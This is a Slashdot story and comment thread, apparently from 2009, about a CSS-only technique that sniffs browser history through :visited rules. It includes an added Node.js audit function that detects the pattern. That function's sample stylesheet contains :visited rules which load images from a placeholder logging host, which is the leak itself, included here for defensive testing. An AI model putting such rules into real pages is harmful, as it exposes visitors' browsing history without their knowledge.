Sniffing Browser History Without Javascript

Posted by kdawson
from the hole-in-css dept.
Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."
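
As an added example (not part of the original story and not the demonstration site's code), here is a small Node.js audit function that flags stylesheet rules of the kind the summary describes: a `:visited` selector whose declarations load a `url()` resource. The function name, the sample stylesheet and the `example.invalid` host are constructed for illustration, and the regex-level parsing assumes no CSS escapes or `@import` rules.

```javascript
// Added example: flag CSS rules where a :visited selector triggers a fetch.
// Assumptions: regex-level parsing only (no CSS escapes, no @import following).

// Constructed sample stylesheet; the example.invalid host is a placeholder.
const SAMPLE_CSS = `
/* ordinary styling, nothing history-dependent is fetched */
a { color: blue; }
a:visited { color: purple; }
#l1:visited { background: url(https://log.example.invalid/hit?id=1); }
@media screen {
  #l2:visited, #l3 { background-image: url("https://log.example.invalid/hit?id=2"); }
}
#l4 { background: url(/img/plain.png); }
`;

function findVisitedFetches(cssText) {
  const findings = [];
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // strip comments
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g; // innermost blocks, also inside @media
  let rule;
  while ((rule = ruleRe.exec(css)) !== null) {
    // Only selectors in the group that depend on visited state are reported.
    const stateful = rule[1].split(",").map((s) => s.trim())
      .filter((s) => /:visited\b/i.test(s));
    if (stateful.length === 0) continue;
    const declRe = /([\w-]+)\s*:\s*([^;]*)/g; // property: value pairs
    let decl;
    while ((decl = declRe.exec(rule[2])) !== null) {
      const urlRe = /url\(\s*(['"]?)(.*?)\1\s*\)/gi; // quoted or bare url()
      let u;
      while ((u = urlRe.exec(decl[2])) !== null) {
        for (const selector of stateful) {
          findings.push({ selector, property: decl[1].toLowerCase(), url: u[2] });
        }
      }
    }
  }
  return findings;
}

console.log(findVisitedFetches(SAMPLE_CSS));
```

A `:visited` rule that only changes colour, like the second rule in the sample, is not reported because it causes no request.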

  • Re:For the Masses (Score:4, Insightful)

    by CopaceticOpus (965603) on Saturday June 13, 2009 @09:10PM (#28323829)

    Anyone who allows their browser to cache and keep a history is stupid? Perhaps your tin foil hat is a size too small.

  • Re:For the Masses (Score:5, Insightful)

    by Goaway (82658) on Saturday June 13, 2009 @09:17PM (#28323857) Homepage

    Some of us actually use the browser history.

  • by bcrowell (177657) on Saturday June 13, 2009 @09:22PM (#28323881) Homepage

    GP post is modded -1 troll, and the parent post, which says "This is not a troll," and explains why, is also modded -1 troll. It's too bad that you can't both mod and comment; I'd have liked to know why the mods thought there was something trollish about both posts.

  • by bcrowell (177657) on Saturday June 13, 2009 @09:28PM (#28323913) Homepage

    Stop overreacting, that is old news and long since fixed.

    Letting someone else's code run on my computer is an act of trust. Once they've shown they're untrustworthy, that's it, as far as I'm concerned. The world's best security software is no good if the author is someone who's demonstrated at least once that you can't trust him.

    NoScript is no more "malware" than Firefox itself.

    This is an interesting statement, but I don't understand your reasoning. Maybe you could explain more. Have the developers of Firefox done something untrustworthy?

    I'm sure you have more crapware and malware installed on your computer that you're blissfully unaware of than you care to admit,

    I don't understand how you know so much about my computer. Maybe you could explain more how you became so well informed about what's on my hard disk. I'm running Ubuntu. Are you aware of a lot of crapware that comes with a freshly installed Ubuntu system? Are you aware of a lot of malware that's been observed in the wild infecting Ubuntu systems? If so, I'd be very interested to hear about it.

  • by bcrowell (177657) on Saturday June 13, 2009 @09:33PM (#28323943) Homepage

    It seems like it's been fixed.

    The issue isn't that the software had a bug that had to be fixed. The issue is that the author of the software has shown himself to be untrustworthy by making his software interfere with other software, for the purpose of increasing his own financial gain from ads.

  • Re:For the Masses (Score:5, Insightful)

    by MightyYar (622222) on Saturday June 13, 2009 @09:42PM (#28323973)

    Most people will never understand and basic exploits like this will always work against them.

    So what, we shouldn't fix it then? The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

  • Alarming? (Score:3, Insightful)

    by actionbastard (1206160) on Saturday June 13, 2009 @09:50PM (#28324015)
    From an exploit standpoint, no. From an editorial standpoint, yes.
  • by Anonymous Coward on Saturday June 13, 2009 @10:37PM (#28324169)

    Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

    Script plz?

    This has been a pet peeve of mine for ages. I've got a bunch of users in a Windows environment without Cygwin, but I'd translate the shell script into DOS .BAT if that's what it takes to solve this problem.

  • by Blue Stone (582566) on Saturday June 13, 2009 @10:51PM (#28324233) Homepage Journal

    If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to apologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

    Unless you're one of those people who believes that anyone less than perfect with a flawless record of behaviour deserves to be castigated for all time for their transgressions, I suggest you consider a concept called 'forgiveness' which, I believe is most appropriate where the transgressor shows genuine remorse. It seems applicable in this situation, but of course, I can only speak for myself.

    (I don't know the guy & I use both noscript and adblock+ with easylist)

  • by Korin43 (881732) on Sunday June 14, 2009 @12:11AM (#28324541) Homepage
    Easylist blocks ads. Easylist blocked an ad on his site. How is this their fault? They are doing exactly what they say they do.
  • by Anonymous Coward on Sunday June 14, 2009 @12:36AM (#28324657)

    You certainly speak for quite a few more than yourself. I for one am really glad someone said it - personally I think a lot of people got way too upset about this, many of whom (from the arguments I've read) did not really understand the issue.

  • by BrokenHalo (565198) on Sunday June 14, 2009 @12:59AM (#28324745)
    the "no mod and comment" rule is perhaps one of the most ill-conceived rules I have seen.

    Then perhaps you haven't understood the concept behind the rule. The idea is to prevent individuals having unrestrained ability to push an agenda of their own: hence mod or post, but not both.

    Unlike some other long-standing rules on this forum, this is one that actually has very sound reasoning behind it.
  • by supernova_hq (1014429) on Sunday June 14, 2009 @02:24AM (#28324959)
    Don't confuse forgiveness with trust.

    If someone borrowed your car and backed into a telephone pole, you would be upset. If they paid for the damages, you would probably forgive them. But the question is: Would you trust them with your car..?
  • Re:Old stuff (Score:5, Insightful)

    by eiMichael (1526385) on Sunday June 14, 2009 @03:37AM (#28325181)
    Just make "visited" only apply within that domain, like a bastardized cookie. I don't care that knows which other links I've been to, but I don't want my browser reporting that I've also been to
  • Re:For the Masses (Score:2, Insightful)

    by aamcf (651492) on Sunday June 14, 2009 @05:08AM (#28325403) Homepage

    Unless you're visiting illegal sites.

    Or sites that are unpopular among your peer group.

    And what about people in repressive regimes who visit illegal sites?

    By exposing your history, there is pressure on you to conform to the standards of those who hold power over you. Not a good thing.

  • Re:Will it.. (Score:2, Insightful)

    by tiananmen tank man (979067) on Sunday June 14, 2009 @11:23AM (#28326663)

    The parent post is marked informative? Informative like it is easy to tell who is a terrorist by the length of their beard?

  • by arose (644256) on Sunday June 14, 2009 @11:47AM (#28326795)

    Half apology, half counterattack.

    Most of his users want stuff blocked not look at his ads, they don't consider him or google special, why not white list all advertisers, not only his own? Not to mention the update mill and resulting page visits. If he could manage to not realize what the hell he was doing once (and I'm not sure I believe that, the default white list and updates had made me iffy even before the incident), he can do it again. I don't want to be there when that happens, not after opening adblock plus one day and seeing white lists I never added and I never had EasyList, just a handful of manually added rules.
